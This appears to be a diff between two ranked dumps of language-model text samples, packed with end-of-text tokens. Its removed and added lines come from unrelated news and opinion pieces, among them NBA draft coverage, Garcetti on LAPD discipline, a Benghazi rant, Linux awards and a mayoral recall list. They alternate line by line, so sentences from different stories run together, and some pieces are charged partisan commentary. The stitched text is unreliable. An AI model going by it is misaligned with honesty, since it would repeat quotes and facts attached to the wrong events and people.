night.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 53; Score = 4784128.0 -<|begin_of_text|>The NBA's newest Canadian players aren't just looking forward to joining their pro teams. +On NBC4's "News Conference" program Sunday morning, Garcetti said he disagreed with the decision. -Nik Stauskas and Tyler Ennis are envisioning the day when they all get together wearing Canada's national team jersey. +"I think I would have respectfully said it should have been something a little more harsh...we don't want to get rid of police officers who have a good career but we do need to make sure this isn't repeated again," Garcetti said. -"I think, once we get in the gym together, getting chemistry and just get all the talent in one gym for the first time, I think that will be a big moment for Canada," Ennis said Thursday night at the NBA draft. "I think not only 2016, but the following Olympics I think we'll be able to make a run at it." +NewsConference: Los Angeles Mayor Garcetti on his first 7 months -Story continues below advertisement +NBC4's Conan Nolan talks with L.A. Mayor Garcetti about the recent criticism of the mayor's first seven months in office. (Published Saturday, Feb. 8, 2014) -Stauskas, a long-range shooter from Mississauga, Ont., went eighth overall to the Sacramento Kings in Thursday night's draft at Barclays Center. Ennis, a point guard from Brampton, Ont., went 18th to the Phoenix Suns. +The victims, a mother and her daughter, were shot while delivering newspapers in the early morning hours of February 7, 2013. Officers believed their target was former LAPD officer Christopher Dorner, who murdered three people during a four day crime spree in Southern California. -Andrew Wiggins, a 19-year-old sensation from Vaughan, Ont., was taken No. 1 overall by the Cleveland Cavaliers. +Despite the disagreement over disciplining the officers, Garcetti voiced support for Beck. -The Canadians were asked in their post-draft interviews if they think Canada can give perennial powerhouse United States a run for their money at the 2016 Rio Olympics. +"My managers I trust and they are going to make different decisions at different points... he's been a super Chief," Garcetti said. -"I talked with Andrew (Wiggins) the last couple of days, just being here in New York at the same time. We're very excited for the future of Canada basketball," Stauskas said. "I feel like, if we really all commit to coming in and working hard and coming together, I think we could have a really good team. +NewsConference: L.A. Mayor Eric Garcetti & High Tech -"I'm not saying we're going to win a gold medal right now, but I'm saying that we could have a chance to compete at that level if we really — if we all commit to it. +NBC4's Conan Nolan talks with Los Angeles Mayor Eric Garcetti on why the city needs a high tech czar. (Published Saturday, Feb. 8, 2014) -Dwight Powell of Toronto was the fourth Canadian drafted Thursday, going 45th overall to the Charlotte Hornets. +On other issues Garcetti defended his efforts at getting rid of the city's business tax, saying it will make the city more competitive in attracting new employers. -The first-round picks confirm Canada will have at least 12 players on NBA rosters next season — second most in the league behind the United States. Canada passed France, which previously held that honour with nine players on NBA rosters. +Garcetti also indicated that he would stay neutral in the campaign to replace Congressman Henry Waxman and that he might endorse a ballot measure that would allow for the recreational +================================================================================ +Rank = 50; Score = 2736128.0 +<|begin_of_text|>The combat code of the US Military is that we don’t abandon our dead or wounded on the battlefield. In US Air Force lingo, fighter pilots don’t run off and leave their wingmen. If one of our own is shot down, still alive and not yet in enemy captivity, we will either come to get him or die trying. Among America’s fighting forces, the calm, sure knowledge that such an irrevocable bond exists is priceless. Along with individual faith and personal grit, it is a sacred trust that has often sustained hope in the face of terribly long odds. -Story continues below advertisement +The disgraceful abandonment of our Ambassador and those brave ex-SEALs who fought to their deaths to save others in that compound is nothing short of dereliction-of-duty. Additionally, the patently absurd cover-up scenario that was fabricated in the aftermath was an outright lie in attempt to shield the President and the Secretary of State from responsibility. -Story continues below advertisement +It has been over eight months since the attack on our compound in Benghazi. The White House strategy, with the aid of a “lap dog press” has been to run out the clock before the truth is forthcoming. The recent testimonies of the three “whistle blowers” have reopened the subject and hopefully will lead to exposure and disgrace of those responsible for this embarrassing debacle. -"It's such a tremendous night for Canadian Basketball. For Andrew, Nik and Tyler to go in the top 18 in such an incredibly deep draft makes such a compelling case for the development of the Canadian game," said Wayne Parrish, Canada Basketball's president and CEO. +It would appear that the most recent firewall which the Administration is counting on is the contention that there were simply no military assets that could be brought to bear in time to make a difference… mainly due to the unavailability of tanker support for fighter aircraft. This is simply BS, regardless how many supposed “experts” the Administration trot out to make such an assertion. The bottom line is that even if the closest asset capable of response was half-way around the world, you don’t just sit on your penguin *** and do nothing. The fact is that the closest asset was not half-way around the world, but as near as Aviano Air Base, Italy where two squadrons of F-16Cs are based. -Canada's men's basketball team hasn't played in the Olympics since Steve Nash led the squad to a seventh-place finish at the 2000 Olympics. +Consider the following scenario (all times Benghazi local): -The +When Hicks in Tripoli receives a call at 9:40 PM from Ambassador Stevens informing him “Greg, we are under attack!” (his last words), he immediately notifies all agencies and prepares for the immediate initiation of an existing “Emergency Response Plan.” At AFRICON, General Carter Ham attempts to mount a rescue effort, but is told to “stand down.” By 10:30 PM an unarmed drone is overhead the compound and streaming live feed to various Command ================================================================================ -Rank = 54; Score = 4784128.0 -<|begin_of_text|>jeremy +Rank = 51; Score = 2719744.0 +<|begin_of_text|>Major League Soccer and adidas on Monday revealed the jersey that will be worn by the MLS All-Stars when they take on Tottenham Hotspur at the 2015 AT&T MLS All-Star Game on July 29 at Dick's Sporting Goods Park in Colorado. -root +The standout feature of the jersey is the traditional soccer sash featuring a modern design that incorporates both a star from the US flag and the leaf from the Canadian flag to commemorate the two nations that make up the league. The same sash design is also found on the neck taping. -Registered: Jun 2000 Distribution: Debian, Red Hat, Slackware, Fedora, Ubuntu Posts: 12,933 +The primary colors of the shirt are red, white and blue in a nod to the new MLS crest, which features those same colors. The three stars that make up the MLS logo are also present on the back of the All-Star jersey with the words identifying the three league pillars they represent: "Club, Country, Community" (below, right). -Rep: +It's also a special 20th-season shirt, celebrating the league's history with a jock tag on the lower left area of the authentic shirts (below, left). -2007 LinuxQuestions.org Members Choice Award Winners +The first players named to the AT&T MLS All-Star team, as well as the Commissioner's two annual selections, were to be revealed on Monday night.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 2588672.0 +<|begin_of_text|>A few days ago, I wrote about one of the dumbest supposedly major controversies in a while, which was one SEVENTEEN member supposedly telling a fan that she was basically his source of income and two others saying that she was a fan of another member. I figured that would be sorta it (because I am a dumbass) since it was either: 1) Fabricated 2) A joke 3) Telling the truth. However, of course things started to snowball because the accusation had to do with disrespect from an idol to a fan. -Desktop Distribution of the Year - Ubuntu (30.83%) +SEVENTEEN fans ended up claiming it was fabricated because Seungkwan‘s signature looks different, but as far as I’m concerned there was nothing conclusive about that. Of course, the same applies to the accuser’s clarifications, which don’t actually prove anything either, yet people are taking her story as solid evidence for whatever reason. -Server Distribution of the Year - Debian (30.30%) +As far as I see it, we’re thus basically back to the battle of narratives. Yet the reason I’m skeptical of her side of the story is that there was a recording she made with Jeonghan that was supposed to make him some kind of dickhead. -Live Distribution of the Year - KNOPPIX (22.88%) +Fansite recording of Junghan -Database of the Year - MySQL (54.36%) +Fan: Today’s dress code… -Office Suite of the Year - OpenOffice.org (89.50%) +Junghan: Stop coming here. -Browser of the Year - Firefox (74.03%) +Fan: (2 seconds pause) Huh…? OK.. But I keep getting picked though. -Desktop Environment of the Year - KDE (52.08%) +Junghan: Then other fans can’t come. Stop coming. -Window Manager of the Year - Compiz (33.65%) +What an asshole, right? -Messaging App of the Year - Pidgin (53.90%) +But the reality of that exchange was basically what I thought the Seungkwan incident was all about, which was idols joking around with fans who show up all the time. -Mail Client of the Year - Thunderbird (53.72%) +일 끝내자마자 음성찾아서 올려드립니다. -Virtualization Product of the Year - VirtualBox (41.58%) +통으로 잘랐으며 어떻게 하든 주작 소리 -Audio Media Player Application of the Year - Amarok (57.37%) +나오니깐 이거라도 주작이 아니라는걸 밝히기위해 변조없이 생으로 올려드립니다. -Audio Authoring Application of the Year - Audacity (68.24%) +(151101 용산팬싸)음성 듣고 알아서 판단하세요. 그리고 고소해 역고소할만큼 이게 팩트니깐. pic.twitter.com/p2l9vw230S — 햄니 (@96519kg) March 22, 2017 -Video Media Player Application of the Year - mplayer (41.78%) +Everybody can have their own interpretation of that exchange, but I definitely see it as two people who recognize each other shooting the shit and not some malicious attack. And once that tone is established between them, it’s harder for me to believe Seungkwan wasn’t joking around +================================================================================ +Rank = 53; Score = 2555904.0 +<|begin_of_text|>Amazon To Hachette And Authors: Here, Let Us Explain Basic Price Elasticity To You -Video Authoring Application of the Year - mencoder (24.21%) +from the lower-price,-make-more-money-dimwits dept -Multimedia Utility of the Year - K3b (63.34%) +A key objective is lower e-book prices. Many e-books are being released at $14.99 and even $19.99. That is unjustifiably high for an e-book. With an e-book, there's no printing, no over-printing, no need to forecast, no returns, no lost sales due to out-of-stock, no warehousing costs, no transportation costs, and there is no secondary market -- e-books cannot be resold as used books. E-books can be and should be less expensive. -Graphics Application of the Year - GIMP (69.15%) +It's also important to understand that e-books are highly price-elastic. This means that when the price goes up, customers buy much less. We've quantified the price elasticity of e-books from repeated measurements across many titles. For every copy an e-book would sell at $14.99, it would sell 1.74 copies if priced at $9.99. So, for example, if customers would buy 100,000 copies of a particular e-book at $14.99, then customers would buy 174,000 copies of that same e-book at $9.99. Total revenue at $14.99 would be $1,499,000. Total revenue at $9.99 is $1,738,000. -Network Security Application of the Year - nmap (24.95%) +The important thing to note here is that at the lower price, total revenue increases 16%. This is good for all the parties involved: The customer is paying 33% less. -Host Security Application of the Year - SELinux (30.69%) +The author is getting a royalty check 16% larger and being read by an audience that's 74% larger. And that 74% increase in copies sold makes it much more likely that the title will make it onto the national bestseller lists. (Any author who's trying to get on one of the national bestseller lists should insist to their publisher that their e-book be priced at $9.99 or lower.) -Monitoring Application of the Year - Nagios (38.58%) +Likewise, the higher total revenue generated at $9.99 is also good for the publisher and the retailer. At $9.99, even though the customer is paying less, the total pie is bigger and there is more to share amongst the parties. Keep in mind that books don't just compete against books. Books compete against mobile games, television, movies, Facebook, blogs, free news sites and more. If we want a healthy reading culture, we have to work +================================================================================ +Rank = 54; Score = 2523136.0 +<|begin_of_text|>Breaking News Emails Get breaking news alerts and special reports. The news and stories that matter, delivered weekday mornings. -Windows on Linux App of the Year - Wine (84.76%) +Oct. 23, 2017, 12:39 PM GMT / Updated Oct. 23, 2017, 12:39 PM GMT By Chuck Todd, Mark Murray and Carrie Dann -IDE/Web Development Editor of the Year - Eclipse (22.29%) +First Read is your briefing from Meet the Press and the NBC Political Unit on the day's most important political stories and why they matter. -Shell of the Year - bash (87.33%) +GOP wrestles with tax politics — but what about the policy? -Text Editor of the Year - vi/vim (36.37%) +WASHINGTON — On a conference call Sunday afternoon with House Republicans, NBC’s Kasie Hunt reports, President Trump issued this warning: The GOP needs to pass his tax plan or it will lose in the 2018 midterms. -File Manager of the Year - Konqueror (38.00%) +Failure, he said, would be “really bad” for the party in next year’s elections, while success would be “like skating on ice.” -Open Source Game of the Year - Battle for Wesnoth (21.74%) +But that focus on the tax plan’s electoral politics — when the midterm cake is already being baked — ignores the more important policy questions right now. -Programming Language of the Year - Python (21.78%) +Will the GOP tax plan really RAISE taxes on middle-class and upper-middle-class Americans? Given that the initial plan eliminates personal exemptions (replaced by a larger standard deduction), the nonpartisan Tax Policy Center said one-quarter of American taxpayers would pay higher taxes by 2027, including 30 percent with incomes between $50,000 and $150,000 and 60 percent of those making between $150,000 and $300,000. -Winners should expect an email, including a nice winners badge in about a day or so. If you have any questions or suggestions on how we can improve the MCA's next year, do let me know. Visit +How much will the plan add to the deficit? The Treasury Department announced Friday that the federal budget deficit increased to $666 billion in the just-completed fiscal year – up from $585 billion last year. And that’s significant, because the Tax Policy Center says the GOP tax plan would reduce revenues by $2.4 trillion over the first 10 years (or $240 billion per year). ---jeremy The polls are closed and the results are in. We had a record number of votes cast for the seventh straight year. Congratulations should go to all nominees. We had some extremely close races this year. Without further ado, here are the winners:Desktop Distribution of the Year - +How much will the wealthy benefit vs. everyone else? Since the GOP proposal, among other things, eliminates the estate tax and lowers taxes for “pass-through” businesses, the same Tax Policy Center says that more than half of the benefits in the first year go to the Top 1 percent of taxpayers, while 30 percent of the benefits will go to the Top 0.1 percent. + +Are Republicans really going to tax 401k accounts? That has been one of the trial balloons that Republicans have released. “The proposals under discussion would potentially cap the annual amount workers can set aside to as low as $2,400 for 401(k) accounts, ================================================================================ -Rank = 55; Score = 4751360.0 -<|begin_of_text|>Why Recall? Here’s a look back at Tom McKay’s first 14 months in office: +Rank = 55; Score = 2490368.0 +<|begin_of_text|>This article was originally published April 20, 2016, at 1:14 p.m. EST. It has been updated to include comments from Sen. John McCain. -1. In a sexual harassment special investigation by former NJ Deputy Attorney General Lee Vartan, Tom McKay was found to have sexually harassed the Township clerk and a rent leveling board volunteer by describing them as lesbians and calling them “man-haters”. McKay never apologized to either woman, but rather blames his actions on his political opponents. The investigation costs Lopatcong taxpayers more than $10,000 and the council must censure the mayor. CensureResolution +WASHINGTON — Pentagon acquisition chief Frank Kendall, in congressional testimony Wednesday, defended the controversial path to end the US reliance on Russian rocket engines for military space launch—and Senate appropriators signaled their continued support. -2. Tom McKay is served with a Tort Claims notice of intent to sue subjecting the Township and its taxpayers to substantial liability for his sexual harassment behavior. +That path, for now, involves using more of the engines while the industrial base ramps up to offer competing engines. DoD could replace the RD-180 engines by 2021 at the soonest, but the politicization of the issue is slowing down needed Congressional action, Kendall, the undersecretary of defense for acquisition, technology and logistics, said at a Senate Appropriations Defense Subcommittee hearing Wednesday. -3. Tom McKay gavels Councilwoman Maureen McCabe in a public meeting and yells at her to “shut up.” Again, he refuses to take responsibility for losing his temper. +"It's a complicated issue, but the [Defense] Department's goals have never changed, to develop two engines, so if one of them has a failure, and we have a big gap in capability, we still have access to space," Kendall said. "We need competition to keep the expense down." -4. Tom McKay publicly posts his personal “10 Commandments” for behavior at public meetings, but when a resident posts beside it her 10 criticisms of his public demeanor, he has them removed. The town receives legal notice from the resident’s lawyer that the Mayor violated her First Amendment rights. +Ultimately, DoD will seek public-private partnerships for reasonably priced launch services, versus buying a lone replacement engine and subsidizing a single company, Kendall said. Replacing the Atlas V with a combination of ULA's Delta IV heavy launch system would cost, Kendall said, as much as $50 million per launch. -5. Tom McKay secretly secured access to the Township’s security cameras without the knowledge or consent of the Council. He also accepted those services as a gift from a Township vendor in violation of his terms of office. +"It would be over $1 billion out of our defense budget to get us off RD-180s, and I don't think that's a good tradeoff," Kendall said. -6. Lopatcong Township loses its credit status with many of its vendors due to the Mayor’s refusal to pay bills on time. Many vendors take a “payment in advance” policy with the Township. +The US Air Force contracts for launch services with United Launch Alliance, a joint venture of Boeing and Lockheed Martin, which uses the RD-180 rocket engine to power its Atlas V launch vehicles. SpaceX is ULA's main competition for Pentagon business, as the company's Falcon 9 rocket won certification last year to compete for military space launches. -7. Tom McKay refused to consider the request led by Councilwoman Ciesla to refinance to Township’s debt obligation, for spite not business, and COST Lopatcong taxpayers $200,000. +× Fear of missing out? Fear no longer. Be the first to hear about breaking news, as it happens. You'll get alerts delivered directly to your inbox each time something noteworthy happens in the Military community. Thanks for signing up. By giving us your email, you are opting in to our Newsletter: Sign up for our Early Bird Brief -8. Tom McKay’s politically motivated banking decisions COST Lopatcong $20,000 in lost revenues. +For their support of DoD's plan, two key appropriators, the SAC-D's ranking member, Sen. Richard Durbin, D-Ill., and subpanel member Sen. Richard Shelby, R-Ala., have attracted the ire of the Senate's lead authorizer, Senate Armed +================================================================================ +Rank = 56; Score = 2490368.0 +<|begin_of_text|>With all the cowardly decisions, especially the recent National Anthem enforcement and the concussions (CTE) deceptions, the real question is: Why does Roger Goodell make $44 mil a year for running the NFL, a monopoly sanctioned by Congress? -9. Tom McKay offered to trade his vote to reappoint the Township’s attorney and engineer for promises that they will not contribute to his opponents’ political campaign. +Maybe the NFL is in cahoots with Washington to distract the citizenry from lawmakers’ own doings, much like the “bread and circuses” of ancient Rome. Football diverts attention and placates the masses. (It’s also said to satisfy men’s innate lust for war but, just to make sure, Washington has us in a bunch of real wars, too.) -10. Tom McKay replaces a long time member of the Township Planning Board with a non-US citizen political ally who, at public meetings, refuses to Pledge Allegiance to the US Flag. +Trump, to his credit, clearly loves football; why else would he wear that helmet hair? But getting rid of the taxpayer-subsidized, tax-exempt status, antitrust exemptions, etc. of the NFL would be a good move for Trump right now. -11. Tom McKay attempts to appoint his personal sexual harassment defense lawyer as the Township’s new labor lawyer. When the Council objects, he sues them. +With all its revenues, why can’t the NFL stand on its own? Anheuser-Busch alone paid $1.4 billion for NFL rights. If you want to sell beer to 18-34-year-old males, the NFL’s the place. If you want to sell power tools, also advertise on the NFL, although maybe also the WNBA. -12. Tom McKay attempts to appoint his personal attorney as the Township’s new general attorney +The American justice system, like the NFL, has tons of laws and rules, often laws layered upon laws by the ruling classes so they can prosecute whom they want, when they want, for whatever they want. Thus, it is within the power of the NFL and its beleaguered commissioner, Roger Goodell, to pursue one thing and not another. Just ask “Deflate-gate” victim Tom Brady. + +Goodell has had a long string of odd decisions. He toyed with penalties for uttering the N-word or sexist slurs. Yet he weighed free speech issues and reached a compromise: Players can listen to rap music but are not allowed to sing along. + +Goodell has dictatorially tinkered with some rules; he once decreed that players can no longer celebrate TDs by dunking the football over the goalpost crossbars. That didn’t go over well. If Americans wanted to watch a sport with no dunking, we’d watch Ivy League college basketball. + +Goodell threatened North Carolina and threatened to pull the Super Bowl from Arizona over legislation he viewed as anti-gay. He didn’t follow through with his threat, but the publicity dashed any hopes Arizona or North Carolina had of hosting the Tony Awards. And the gay rodeo business is non-existent ================================================================================ -Rank = 56; Score = 4620288.0 -<|begin_of_text|>Less than 24 hours after Minneapolis voters finished hacking through a 35-candidate ballot, the Charter Commission voted unanimously to raise the entry fee from $20 to $500, matching St. Paul's. +Rank = 57; Score = 2490368.0 +<|begin_of_text|>California marked the month-long celebration Sikh Awareness Month (SAAM) celebrations for the fifth year in a row. With Donald Trump's the US President-elect, this year's awareness month could potentially be the most important SAAM to date, as the future of Sikh Americans hangs in the balance, said Sikh Coalition community development manager Harjit Kaur. She said minority communities across the nation have experienced an uptick in hate crimes, bullying, and discrimination as a result of the current political climate.A series of Sikh-related events were organised through the month, from local activities in schools to collaborating with the basketball team, the Los Angeles Clippers.Sikh Coalition community development manager Harjit Kaur explains how it all came about. “Since November 2010, California community leaders have engaged with legislators to recognize the contribution of Sikh Americans to California and to provide a platform to create aware ness about Sikhs in California educational institutions and the community.“ Harjit elaborates, “This year, Assembly member Jim Cooper presented Dr Onkar Singh Bindra and me with the state member resolution celebrating Sikh Awareness and Appreciation Month. California state superintendent of public instruction Tom Torlakson also recognised November as the awareness month for California's public schools. Sikh Awareness and Appreciation resolutions have been passed in Yuba City, Fresno, San Jose, Bakersfield, Fremont, Santa Cruz, and Santa Clara, along with numerous school districts across the state.The Sikh Coalition, along with many volunteers, has delivered presentations to hundreds of Californians across the state in classrooms and local libraries.The Sikh Coalition also co-hosted a Sikh Awareness and Appreciation game with the Los Angeles Clippers.Over 350 Sikh Americans attended the LA Clippers game alongside the other 19,000 spectators. It also featured the US national anthem by Raaginder `Violinder' Singh on the violin as well as the Los Angeles Sikh Boy Scouts of America colour guard, and half-time entertainment by Da Real Punjabiz.Harjeet said they work tirelessly to ensure that SAAM is used as a platform to meaningfully engage with legislators, educators, and community members across the state to address these issues. “This year, after helping to protect Sikh history in California in July, the Sikh Coalition secured safe passage of AB-2845, a groundbreaking new anti-bullying law in California in September“.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 58; Score = 2457600.0 +<|begin_of_text|>WASHINGTON–John McCain is the latest high-profile politician to repeat the diehard American falsehood that the 9/11 terrorists entered the United States through Canada. Just days after Janet Napolitano, the U.S. homeland security secretary, sparked a diplomatic kerfuffle by suggesting the terrorists took a Canadian route to the U.S. eight years ago, McCain defended her by saying that, in fact, the former Arizona governor was correct. "Well, some of the 9/11 hijackers did come through Canada, as you know," McCain, last year's Republican presidential candidate, said on Fox News on Friday. The Arizona senator's remarks prompted the Canadian embassy to immediately reissue remarks made earlier this week by Ambassador Michael Wilson, who reminded Americans once again that no 9/11 perpetrators came to the U.S. via Canada. "Unfortunately, misconceptions arise on something as fundamental as where the 9/11 terrorists came from," Wilson said. -The lower fee, in place for at least 40 years -- according to commissioner Lyall Schwarzkopf, who remembered it from when he was city clerk in 1972 -- had enabled candidates, in the absence of a primary, to make "a mockery" of recent mayoral elections, said Commissioner Devin Rice. +Article Continued Below -"We shouldn't overreact, but 35 candidates was ridiculous," said Commisisoner Jan Sandberg. "We absolutely have to do something about that filing fee." +"As the 9/11 Commission reported in July 2004, all of the 9/11 terrorists arrived in the U.S. from outside North America. They flew to major U.S. airports. They entered the U.S. with documents issued to them by the U.S. government. No 9/11 terrorists came from Canada." Crestfallen embassy officials contacted McCain's office soon after his Fox News remarks to set the record straight. McCain, an avid supporter of NAFTA and a powerful friend to Canada on Capitol Hill, recently visited the Canadian Embassy and had lunch with Wilson. The normally reserved Wilson made his 9/11 remarks on Tuesday following a CBC interview in which Napolitano appeared to believe that the hijackers entered the U.S. from Canada. -The $20 fee is set by a state law which allows cities to adopt higher fees. The $20 fee applied to only four cities: Minneapolis, St. Paul, Duluth and Rochester. St. Paul had put a $50 fee in place, then raised that to $500 in 2010. 